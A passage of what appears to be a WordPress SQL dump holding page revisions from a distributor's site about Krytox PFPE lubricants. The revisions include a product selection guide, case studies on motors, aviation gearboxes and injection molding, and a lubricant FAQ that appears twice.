These greases use a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The grease is slightly tacky, and it will coat the surface and stay in place. For additional information, refer to “Krytox XHT Grease with Special Non-Melting Thickener.”\r\n<h4><strong>Krytox Lubricant Specialty Products</strong></h4>\r\nSpecialty products include:\r\n<ul>\r\n 	<li>H-1 rated food grade lubricants (discussed in more detail in “Krytox General-Purpose Greases and Oils”)</li>\r\n 	<li>Krytox NRT lubricants for oxygen systems and reactivegases</li>\r\n 	<li>Krytox XP lubricants with soluble additives</li>\r\n 	<li>Wide temperature range, high vacuum linear PFPE products</li>\r\n</ul>\r\n<h4><strong>Other Considerations</strong></h4>\r\nMany factors affect the performance of a grease and bearing, and those factors can affect grease and component life as well. Standard grease consistency is NLGI Grade 2 penetration. Sometimes, a harder Grade 3 grease or softer Grade 1 grease is needed and can be ordered. For example, softer Grade 00 or 0 greases are often used in gearboxes. In bearing applications, different types of bearings place different stresses on grease; ball bearings cause little stress, whereas roller bearings will tend to grind and work the grease severely. This stress can shorten grease life and require more frequent re-lubrication or result in the need for more viscous base oil in the grease. This Product Selection Guide is a starting point to help in the selection of the Krytox lubricant suitable for your tough applications.\r\n<h4><strong>To view our line of Krytox products see below:</strong></h4>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nTo learn more about Krytox product(s) please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Product Selection Guide', '', 'inherit', 'closed', 'closed', '', '2317-revision-v1', '', '', '2016-10-12 19:53:11', '2016-10-12 19:53:11', '', 2317, 'https://www.miller-stephenson.com/2317-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2596, 2, '2016-10-12 19:54:13', '2016-10-12 19:54:13', '<strong>Krytox™ Lube For Life</strong>\r\n\r\n<strong>A North American company improves equipment reliability by switching lubricants.</strong>\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n\r\n<strong>The Solutions</strong>\r\n\r\nAfter researching available options, the reliability superintendent turned to Krytox™ for help. Working with the Krytox™ technical service team, the mill implemented the use of Krytox™ grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox™ lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox™ lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox™ lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox™ lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox™ greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox™ greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox™ greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox™ greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox™ greases provide a thicker oil layer and reduce wear. Krytox™ greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.\r\n\r\n[ux_product_categories ids="37" number="10"]\r\n\r\nTo learn more about Krytox™ Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-10-12 19:54:13', '2016-10-12 19:54:13', '', 1117, 'https://www.miller-stephenson.com/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2597, 2, '2016-10-12 19:54:36', '2016-10-12 19:54:36', '<h1><span style="font-size: 100%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span></h1>\r\n<h4><strong>Innovations for the Aviation Industry</strong></h4>\r\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n<h4><strong>Examples of Aviation-Related Applications</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-250ad/">Krytox 250AD</a> grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\r\n 	<li>Krytox aviation greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/agl-683/">Krytox AGL 683</a> grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\r\n 	<li>Krytox AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1, approved for incidental food contact.</a></li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\r\n 	<li>Krytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\r\n</ul>\r\n[ux_product_categories ids="86,79" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2016-10-12 19:54:36', '2016-10-12 19:54:36', '', 2302, 'https://www.miller-stephenson.com/2302-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2598, 2, '2016-10-12 19:54:59', '2016-10-12 19:54:59', '<strong>Krytox AGL 683 Aviation Gear Box Grease - Case Study</strong>\r\n\r\n<strong>Aircraft Cabin Air Conditioning and Temperature Control System Application</strong>\r\n\r\nAircraft systems manufacturer improves flying experience with help from custom lubricant.\r\n\r\n<strong>Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance</strong>\r\n\r\nA systems manufacturer designed a cabin air conditioning and temperature control system for the latest series of large passenger aircraft that makes flying a more comfortable experience for passengers and flight crews. Compared to traditional systems, the new system provides higher humidity, improved air quality, lower cabin pressure, and less noise in the cabin.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe manufacturer needed a lubricant that could meet the demanding requirements of the electromechanical actuator gearbox in the control system. Specifically, the lubricant had to provide superior lubricity over an operating temperature ranging from –55–100 °C (–67–212 °F) and perform with very limited torque. In addition, the gearbox was required to operate for extended periods of time without re-lubrication.\r\n\r\n<strong>The Solution</strong>\r\n\r\nChemours developed a new product specifically designed to meet the needs of the electro-mechanical actuator gearbox. Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque while delivering exceptional lubricity.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox AGL 683 lubricant, the aircraft systems manufacturer was able to extend lubrication intervals.</li>\r\n 	<li>Chemours has the knowledge to put science to work to develop a custom-designed lubricant that met the specific needs of this critical system.</li>\r\n 	<li>Krytox AGL 683 lubricant can be used for other electro-mechanical gearbox applications.</li>\r\n</ul>\r\n[product id="1072" columns="1"]\r\n\r\nTo learn more about Krytox AGL 683, please <a href="https://www.miller-stephenson.com/product/agl-683/">click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox AGL 683 Case Study - Gearbox Grease', '', 'inherit', 'closed', 'closed', '', '2311-revision-v1', '', '', '2016-10-12 19:54:59', '2016-10-12 19:54:59', '', 2311, 'https://www.miller-stephenson.com/2311-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2599, 2, '2016-10-12 20:00:12', '2016-10-12 20:00:12', '<span style="font-size: 120%;"><strong>Krytox FAQ</strong></span>\r\n\r\n<span style="font-size: 110%;"><strong>Introduction to Krytox Lubricants</strong></span>\r\n\r\n<strong>What is Krytox FAQ?</strong>\r\n\r\nKrytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature performance, nonflammability, oxygen compatibility, and resistance to aggressive chemicals are required. In this Krytox FAQ we discuss all the uses, applications and specifications of Krytox.\r\n\r\n<strong>What are the primary differences in Krytox oils?</strong>\r\n<ul>\r\n 	<li>Krytox XHT oils have additional treatment to make them more thermally stable at temperatures over 300 °C (572 °F) and have very high viscosity to withstand the temperatures and provide adequate lubrication.</li>\r\n 	<li>Krytox aerospace oils have more strict volatility specifications and are a narrower distillation than GPL oils.</li>\r\n 	<li>Krytox vacuum pump fluids are distilled to give an excellent vapor pressure and are designed for specific OEM pumps.</li>\r\n 	<li>Krytox linear oils have a better viscosity index and operate over a wider temperature range.</li>\r\n 	<li>Krytox GPL oils are formulated to provide a cost effective base oil for industrial applications.</li>\r\n</ul>\r\n<strong>Does Krytox contain silicone?</strong>\r\n\r\nNo. Krytox oils and greases do not contain any silicones,and there are no silicones used in processing.\r\n\r\n<strong>What are the different grades of Krytox GPL lubricants and their typical applications?</strong>\r\n<ul>\r\n 	<li>The Krytox GPL 10X oil /20X grease series contain no additives and can be used on components that come in contact with most chemicals typically used in industry. Typical applications include valves or bearings, seal barrier fluids, instruments, and oxygen systems.</li>\r\n 	<li>The Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or extremely heavily loaded applications.</li>\r\n 	<li>The Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor; it also improves load carrying performance and is ideal for corrosive environments. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.</li>\r\n 	<li>The Krytox GPL 29X greases have EP and anticorrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection.</li>\r\n 	<li>The Krytox GPL 2EX lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anti-corrosion additive.</li>\r\n</ul>\r\n<strong>What is Krytox made of?</strong>\r\n\r\nKrytox fluorinated oils are a series of low molecular weight, fluorine end-capped, homopolymers of hexafluoropropylene epoxide. The polymer chain is completely saturated and contains only the elements carbon, oxygen, and fluorine; hydrogen is not present. On a weight basis, typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\n<span style="font-size: 110%;"><strong>Krytox FAQ Applications</strong></span>\r\n\r\n<strong>Where can Krytox lubricants be used?</strong>\r\n\r\nKrytox lubricants can be used in applications where nonflammability, oxygen compatibility, materials compatibility, high temperature stability, and resistance to aggressive chemicals are requirements. Some examples include:\r\n<ul>\r\n 	<li><strong>Automotive</strong>: Wheel bearing grease, CV joint grease, universal joint grease, fan clutch bearing grease, emission air pump grease, spark plug boot lubricant, weather stripping lubricant, sunroof seal lubricant, clutch throw out bearing grease, ABS system grease, paint plant conveyor bearings, paint spray system valve lubrication, gasoline pump bearings, windshield wiper motors, oil pressure sensors, truck window lift mechanism, sintered bearings in motors, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls</li>\r\n 	<li><strong>Aviation</strong>: Fuel resistant grease, oxygen compatible grease, ventilation fan bearing grease, cruise missile rear main bearing lubricant, starter bearing grease, emergency generator bearing grease, missile launch\r\nplatform gear lubricant, space shuttle lubricant, sealant</li>\r\n 	<li><strong>Pumps</strong>: Vacuum pump fluid for corrosive and hazardous service, bearing grease for chemical pumps, O-ring lubricant, barrier fluid between double mechanical seals • Industrial: Corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, gear oil, linear bearing lubricant, high temperature fans, clean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed-for-life motors, conveyor system in glass and aluminum plants, textile calender roll bearings, brick kiln car bearings, film blowing machines</li>\r\n 	<li><strong>Nuclear</strong>: Submerged sump pump bearings, containment cooling fans, snubbers, control rod drive mechanism fan motors</li>\r\n 	<li><strong>Valves</strong>: Lubricant for valve stem packing, relief valve lubricant, O-ring lubricant, steam turbine control valves, low emissions valve stem packing lubricant</li>\r\n 	<li><strong>Miscellaneous</strong>: Anti-seize lubricant, bolt thread lubricant, water purifier lubricant, self-contained breathing apparatus lubricant, cryogenic lubricant, vacuum system sealant, drive chains, hydraulic fluids, instrument barrier fluids, heat transfer fluids, geothermal system grease, mold release agent, fishing reel grease, industrial toast making oven conveyor bearings, windmill gearboxes, glove curing conveyor</li>\r\n</ul>\r\n<strong>What is the NLGI consistency of Krytox grease grades?</strong>\r\n\r\nGreases are formed by mixing the base oil with a thickener to form a grease. Krytox greases use a special high-thickening efficiency, low molecular weight polytetrafluoroethylene (PTFE) with very small particle sizes as their thickener. This is one of the most thermally stable thickeners for high-temperature, long-term greases. The higher thickening efficiency of the special PTFE thickener allows Chemours to formulate grease to\r\nmaximize oil content for improved grease performance.\r\nGreases can be formulated with different viscosity oils to handle different temperatures and load conditions. High viscosity oils can be used in greases for high temperatures, heavy loads, or low speed applications.\r\nLow viscosity oils can be used in greases where low temperature properties are important or speeds are higher. Lower amounts of thickener form softer or more fluid-like greases. Higher solid levels form harder, stiffer\r\ngreases. Additives are often added to the grease to enhance anti-corrosion protection, raise load carrying ability, or help reduce wear.\r\nOur standard grease grade is NLGI Grade 2; however, upon request, we produce NLGI Grades 000 through 6.\r\n\r\n<strong>Do I need to do anything special before using Krytox in bearings?</strong>\r\n\r\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used during storage. If hydrocarbon oils are left in a bearing, the oils can form carbon deposits at high temperatures that may accelerate bearing failure. Please ask for “New Bearing Preparation with Krytox Lubricants” for the recommended cleaning and repacking procedure, as well as guidance on how much grease to use and speed considerations.\r\n\r\n<strong>Is ongoing lubrication required once we’ve begun using Krytox?</strong>\r\n\r\nRe-lubrication of bearings may be required: typically every 1–3 months for corrugators, depending on the equipment operating temperature. For other applications, re-lubrication intervals can be from months to years or\r\npotentially never in the case of sealed systems.\r\n\r\n<strong>Can I mix Krytox grease with other greases?</strong>\r\n\r\nThe performance benefits of Krytox grease will not be achieved if Krytox is mixed with a non-perfluoropolyether (PFPE) grease. The performance of the grease mixture will be limited by the properties of the non-PFPE grease in the mixture. Krytox grease will not react with the other grease, nor cause decomposition or any hazardous reactions. The mixing tests that Chemours has done have shown that the mixture sometimes softens up by about one penetration grade when it is heated up. This normally will not be enough change to cause any significant problems.\r\nThe Krytox grease will not stop the other lubricant from breaking down from heat and oxidation. It is likely that the additives in the hydrocarbon grease have coated the bearing surfaces, and the Krytox grease will not be able to adhere to the bearing—so most of it might get thrown out of the bearing.\r\n\r\n<span style="font-size: 110%;"><strong>Characteristics of Krytox FAQ</strong></span>\r\n\r\n<strong>What approvals and certifications do Krytox lubricants have?</strong>\r\n\r\nKrytox lubricants have the following certifications:\r\n<ul>\r\n 	<li>ISO 9001 Certified Quality Management System</li>\r\n 	<li>ISO 14001 Certified Environmental Management System</li>\r\n</ul>\r\nIn addition, certain grades have the following approvals:\r\n<ul>\r\n 	<li>MIL-Spec PRF-27617 approved grades for aerospace and aviation use</li>\r\n 	<li>NSF H-1 food grade lubricants approved for incidental food contact</li>\r\n 	<li>Independently tested and confirmed for LOX and GOX use by major oxygen manufacturers and certification authorities</li>\r\n</ul>\r\nAre Krytox lubricants flammable?\r\n\r\nNo. Krytox lubricants are not combustible, nor do they ignite.\r\n\r\n<strong>How stable is Krytox when exposed to chemicals?</strong>\r\n\r\nKrytox PFPE oils and greases thickened with PTFE exhibit exceptional chemical stability. Krytox oils and greases will not react with most chemicals (with the exception of Lewis acids and alkali metals) and other\r\nlubricants, nor cause them to degrade. Krytox performance lubricants are not only resistant to oxygen and reactive gases, but they are inert to virtually all chemicals commonly used in most industries. For further information, please ask for “Krytox Lubricants: Chemical Stability.”\r\n\r\n<strong>Is Krytox compatible with nonmetallic materials?</strong>\r\n\r\nYes. Krytox oils and greases have been used as plastic or elastomer component lubricants for over 40 years. For more specific information, please ask for “Krytox Lubricants Plastics and Elastomer Compatibility.”\r\n\r\n<strong>Is Krytox oil hard to clean up?</strong>\r\n\r\nThe very characteristic that makes Krytox lubricant work as well as it does, i.e., its inertness to chemical attack, also makes it insoluble in most common solvents and is why it cannot be washed out with water. A small amount of a fluorinated solvent such as Krytox Solvent, Krytox HC Plus Cleaner, or Vertrel XF on a rag or towel will easily remove remaining traces of Krytox. For additional information, please request “Krytox HC Plus Cleaner” and “Krytox Solvent.”\r\n\r\n<strong>What is the shelf life of Krytox lubricants?</strong>\r\n\r\nKrytox greases and oils with no additives have an indefinite shelf life if left unopened and stored in a clean, dry location. The service life of Krytox is difficult to predict because there are so many variables. Testing\r\ndocuments Krytox grease at 200 ºC (392 °F) and 10,000 rpm for over 5,000 hours in an ASTM D3336 life test, and the bearings did not fail. For more detailed information, please ask for “Shelf Life Profile of Krytox\r\nLubricants.”\r\n\r\n<strong>What lubrication equipment can I use with Krytox grease?</strong>\r\n\r\nGenerally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. For more information about equipment grades and a discussion of grease fittings,\r\nplease ask for “Equipment Selection for Applying Krytox Lubricants.”\r\n\r\n<strong>TO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]\r\n\r\nThis Krytox FAQ is for educational purposes. To find your appropriate grade of Krytox please contact us or <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here to visit our Krytox database.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Frequently Asked Questions (FAQ)', '', 'inherit', 'closed', 'closed', '', '2277-revision-v1', '', '', '2016-10-12 20:00:12', '2016-10-12 20:00:12', '', 2277, 'https://www.miller-stephenson.com/2277-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2600, 2, '2016-10-12 20:06:27', '2016-10-12 20:06:27', '“We have been using Krytox XHT-BDX for seven years now. We did a case study, and found out that we gained an additional 40% life between preventative maintenance (PM’s).” - A satisfied Krytox customer\r\n\r\n&nbsp;\r\n\r\n<strong>The Problem</strong>\r\n\r\nThe Injection Molding industry for Tier 1 auto suppliers require hundreds of man hours in preventative maintenance labor. Not using Krytox results in:\r\n<ul>\r\n 	<li>High labor costs</li>\r\n 	<li>Contaminated parts</li>\r\n 	<li>More frequent preventative maintenance</li>\r\n</ul>\r\n<strong>The Solution</strong>\r\n\r\nKrytox lubrication has been designed and demonstrated to provide the best available equipment performance and lowest available life cycle cost. Krytox XHT-BDX delivers:\r\n<ul>\r\n 	<li>Maintenance and capital savings</li>\r\n 	<li>Increased life cycle between maintainence</li>\r\n 	<li>Does not migrate to the surface or wick out</li>\r\n 	<li>Extreme heat tolerance / Doesn’t thin</li>\r\n</ul>\r\n<strong>The Application</strong>\r\n<ul>\r\n 	<li>Lifters</li>\r\n 	<li>Slides</li>\r\n 	<li>Ejector Pins</li>\r\n 	<li>Retractors</li>\r\n</ul>\r\n<strong>Demonstrated Solutions</strong>\r\n\r\nFor over 20 Years Krytox has provided state-of-the-art performance for mechanical systems under harsh conditions. From gearboxes, bearings and chains to seals, actuators, valves and more Krytox serves the specialized needs of:\r\n<ul>\r\n 	<li>Pulp and paper mills</li>\r\n 	<li>Automotive Components</li>\r\n 	<li>Military and commercial aircraft</li>\r\n 	<li>Chemical plants</li>\r\n 	<li>Power plants</li>\r\n 	<li>Turbine generators</li>\r\n 	<li>Other critical industrial applications</li>\r\n</ul>\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox for Injection Molding', '', 'inherit', 'closed', 'closed', '', '1115-revision-v1', '', '', '2016-10-12 20:06:27', '2016-10-12 20:06:27', '', 1115, 'https://www.miller-stephenson.com/1115-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2601, 2, '2016-10-12 20:07:52', '2016-10-12 20:07:52', '<h1><span style="font-size: 120%;"><strong>Krytox FAQ</strong></span></h1>\n<h2><span style="font-size: 110%;"><strong>Introduction to Krytox Lubricants</strong></span></h2>\n<h4><strong>What is Krytox FAQ?</strong></h4>\nKrytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature performance, nonflammability, oxygen compatibility, and resistance to aggressive chemicals are required. In this Krytox FAQ we discuss all the uses, applications and specifications of Krytox.\n<h4><strong>What are the primary differences in Krytox oils?</strong></h4>\n<ul>\n 	<li>Krytox XHT oils have additional treatment to make them more thermally stable at temperatures over 300 °C (572 °F) and have very high viscosity to withstand the temperatures and provide adequate lubrication.</li>\n 	<li>Krytox aerospace oils have more strict volatility specifications and are a narrower distillation than GPL oils.</li>\n 	<li>Krytox vacuum pump fluids are distilled to give an excellent vapor pressure and are designed for specific OEM pumps.</li>\n 	<li>Krytox linear oils have a better viscosity index and operate over a wider temperature range.</li>\n 	<li>Krytox GPL oils are formulated to provide a cost effective base oil for industrial applications.</li>\n</ul>\n<h4><strong>Does Krytox contain silicone?</strong></h4>\nNo. Krytox oils and greases do not contain any silicones,and there are no silicones used in processing.\n<h4><strong>What are the different grades of Krytox GPL lubricants and their typical applications?</strong></h4>\n<ul>\n 	<li>The Krytox GPL 10X oil /20X grease series contain no additives and can be used on components that come in contact with most chemicals typically used in industry. Typical applications include valves or bearings, seal barrier fluids, instruments, and oxygen systems.</li>\n 	<li>The Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or extremely heavily loaded applications.</li>\n 	<li>The Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor; it also improves load carrying performance and is ideal for corrosive environments. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.</li>\n 	<li>The Krytox GPL 29X greases have EP and anticorrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection.</li>\n 	<li>The Krytox GPL 2EX lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anti-corrosion additive.</li>\n</ul>\n<h4><strong>What is Krytox made of?</strong></h4>\nKrytox fluorinated oils are a series of low molecular weight, fluorine end-capped, homopolymers of hexafluoropropylene epoxide. The polymer chain is completely saturated and contains only the elements carbon, oxygen, and fluorine; hydrogen is not present. On a weight basis, typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\n<h4><span style="font-size: 110%;"><strong>Krytox FAQ Applications</strong></span></h4>\n<h4><strong>Where can Krytox lubricants be used?</strong></h4>\nKrytox lubricants can be used in applications where nonflammability, oxygen compatibility, materials compatibility, high temperature stability, and resistance to aggressive chemicals are requirements. Some examples include:\n<ul>\n 	<li><strong>Automotive</strong>: Wheel bearing grease, CV joint grease, universal joint grease, fan clutch bearing grease, emission air pump grease, spark plug boot lubricant, weather stripping lubricant, sunroof seal lubricant, clutch throw out bearing grease, ABS system grease, paint plant conveyor bearings, paint spray system valve lubrication, gasoline pump bearings, windshield wiper motors, oil pressure sensors, truck window lift mechanism, sintered bearings in motors, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls</li>\n 	<li><strong>Aviation</strong>: Fuel resistant grease, oxygen compatible grease, ventilation fan bearing grease, cruise missile rear main bearing lubricant, starter bearing grease, emergency generator bearing grease, missile launch\nplatform gear lubricant, space shuttle lubricant, sealant</li>\n 	<li><strong>Pumps</strong>: Vacuum pump fluid for corrosive and hazardous service, bearing grease for chemical pumps, O-ring lubricant, barrier fluid between double mechanical seals • Industrial: Corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, gear oil, linear bearing lubricant, high temperature fans, clean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed-for-life motors, conveyor system in glass and aluminum plants, textile calender roll bearings, brick kiln car bearings, film blowing machines</li>\n 	<li><strong>Nuclear</strong>: Submerged sump pump bearings, containment cooling fans, snubbers, control rod drive mechanism fan motors</li>\n 	<li><strong>Valves</strong>: Lubricant for valve stem packing, relief valve lubricant, O-ring lubricant, steam turbine control valves, low emissions valve stem packing lubricant</li>\n 	<li><strong>Miscellaneous</strong>: Anti-seize lubricant, bolt thread lubricant, water purifier lubricant, self-contained breathing apparatus lubricant, cryogenic lubricant, vacuum system sealant, drive chains, hydraulic fluids, instrument barrier fluids, heat transfer fluids, geothermal system grease, mold release agent, fishing reel grease, industrial toast making oven conveyor bearings, windmill gearboxes, glove curing conveyor</li>\n</ul>\n<h4><strong>What is the NLGI consistency of Krytox grease grades?</strong></h4>\nGreases are formed by mixing the base oil with a thickener to form a grease. Krytox greases use a special high-thickening efficiency, low molecular weight polytetrafluoroethylene (PTFE) with very small particle sizes as their thickener. This is one of the most thermally stable thickeners for high-temperature, long-term greases. The higher thickening efficiency of the special PTFE thickener allows Chemours to formulate grease to\nmaximize oil content for improved grease performance.\nGreases can be formulated with different viscosity oils to handle different temperatures and load conditions. High viscosity oils can be used in greases for high temperatures, heavy loads, or low speed applications.\nLow viscosity oils can be used in greases where low temperature properties are important or speeds are higher. Lower amounts of thickener form softer or more fluid-like greases. Higher solid levels form harder, stiffer\ngreases. Additives are often added to the grease to enhance anti-corrosion protection, raise load carrying ability, or help reduce wear.\nOur standard grease grade is NLGI Grade 2; however, upon request, we produce NLGI Grades 000 through 6.\n<h4><strong>Do I need to do anything special before using Krytox in bearings?</strong></h4>\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used during storage. If hydrocarbon oils are left in a bearing, the oils can form carbon deposits at high temperatures that may accelerate bearing failure. Please ask for “New Bearing Preparation with Krytox Lubricants” for the recommended cleaning and repacking procedure, as well as guidance on how much grease to use and speed considerations.\n\n<strong>Is ongoing lubrication required once we’ve begun using Krytox?</strong>\n\nRe-lubrication of bearings may be required: typically every 1–3 months for corrugators, depending on the equipment operating temperature. For other applications, re-lubrication intervals can be from months to years or\npotentially never in the case of sealed systems.\n\n<strong>Can I mix Krytox grease with other greases?</strong>\n\nThe performance benefits of Krytox grease will not be achieved if Krytox is mixed with a non-perfluoropolyether (PFPE) grease. The performance of the grease mixture will be limited by the properties of the non-PFPE grease in the mixture. Krytox grease will not react with the other grease, nor cause decomposition or any hazardous reactions. The mixing tests that Chemours has done have shown that the mixture sometimes softens up by about one penetration grade when it is heated up. This normally will not be enough change to cause any significant problems.\nThe Krytox grease will not stop the other lubricant from breaking down from heat and oxidation. It is likely that the additives in the hydrocarbon grease have coated the bearing surfaces, and the Krytox grease will not be able to adhere to the bearing—so most of it might get thrown out of the bearing.\n\n<span style="font-size: 110%;"><strong>Characteristics of Krytox FAQ</strong></span>\n\n<strong>What approvals and certifications do Krytox lubricants have?</strong>\n\nKrytox lubricants have the following certifications:\n<ul>\n 	<li>ISO 9001 Certified Quality Management System</li>\n 	<li>ISO 14001 Certified Environmental Management System</li>\n</ul>\nIn addition, certain grades have the following approvals:\n<ul>\n 	<li>MIL-Spec PRF-27617 approved grades for aerospace and aviation use</li>\n 	<li>NSF H-1 food grade lubricants approved for incidental food contact</li>\n 	<li>Independently tested and confirmed for LOX and GOX use by major oxygen manufacturers and certification authorities</li>\n</ul>\nAre Krytox lubricants flammable?\n\nNo. Krytox lubricants are not combustible, nor do they ignite.\n\n<strong>How stable is Krytox when exposed to chemicals?</strong>\n\nKrytox PFPE oils and greases thickened with PTFE exhibit exceptional chemical stability. Krytox oils and greases will not react with most chemicals (with the exception of Lewis acids and alkali metals) and other\nlubricants, nor cause them to degrade. Krytox performance lubricants are not only resistant to oxygen and reactive gases, but they are inert to virtually all chemicals commonly used in most industries. For further information, please ask for “Krytox Lubricants: Chemical Stability.”\n\n<strong>Is Krytox compatible with nonmetallic materials?</strong>\n\nYes. Krytox oils and greases have been used as plastic or elastomer component lubricants for over 40 years. For more specific information, please ask for “Krytox 